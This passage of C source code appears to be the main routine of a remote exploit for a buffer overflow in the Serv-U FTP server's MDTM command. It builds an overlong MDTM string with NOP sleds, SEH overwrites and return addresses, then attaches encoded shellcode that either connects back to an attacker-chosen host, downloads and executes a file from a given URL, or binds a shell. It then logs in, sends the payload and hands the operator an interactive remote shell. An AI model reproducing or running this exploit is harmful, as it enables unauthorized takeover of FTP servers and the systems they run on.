case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 'd':
url = argv[i+1];
bUrl=TRUE;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return -1;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return -1;
}
if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return -1;
}
if(bUrl)
{
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
{
usage(argv[0]);
printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
return -1;
}
}
if(strstr(targets[iType].szDescription, "2.x"))
{
b2x = TRUE;
printf("[*] Attack Target is Serv-U 2.x.\r\n");
}
else
{
printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "MDTM" command
strcpy(szCommand, "MDTM 20031111111111+");
// fill the egg
for(i=0; i<SEH_OFFSET; i++)
{
strcat(szCommand, "\x90");
}
// ret addr
if(b2x)
{
// fill the egg
if(strstr(targets[iType].szDescription, "<"))
{
j = 8;
}
else
{
j = 4;
}
for(i=0; i<j; i++)
{
strcat(szCommand, "\x90");
}
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4);
// fill the decode
strcat(szCommand, decode);
}
else
{
// fill the seh
for(i=0; i<0x10*1; i+=8)
//for(i=0; i<1; i++)
{
memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode2);
}
// fill the space
strcat(szCommand, " ");
// fill the egg
for(i=0; i<0x10; i++)
{
strcat(szCommand, "\x90");
}
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9999;
cbip = inet_addr(cbHost)^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
if(bUrl)
{
memset(downloadurl, 0, sizeof(downloadurl));
// download url exec shellcode
for(i=0;i<strlen(url);i++)
{
downloadurl[i] = url[i] ^ 0x99;
}
downloadurl[i] ^= 0x99;
strcat(szCommand, dusc);
strcat(szCommand, downloadurl);
}
else
{
// rebind shellcode
shport2 = htons(shport)^(u_short)0x9999;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return -1;
}
//printf("send size %d:%s", strlen(szCommand), szCommand);
//printf("buffsize %d\r\n", strlen(szCommand)-5-2);
#ifndef UNIX
__try
#endif
{
#ifndef UNIX
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
#endif
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
#ifndef UNIX
sa.sin_addr.S_un.S_addr=inet_addr(ip);
#else
sa.sin_addr.s_addr=inet_addr(ip);
#endif
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
#ifndef UNIX
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
#else
server.sin_addr.s_addr=inet_addr(cbHost);
#endif
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
if(bUrl)
{
printf("[+] Target Download the file and exec: %s\r\n", url);
printf("[+] Success? Maybe!\r\n");
}
else
{
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
}
#ifdef UNIX
exit_try:
#endif
#ifndef UNIX
__finally
#endif
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
#ifndef UNIX
WSACleanup();
#endif
}
return 0;
}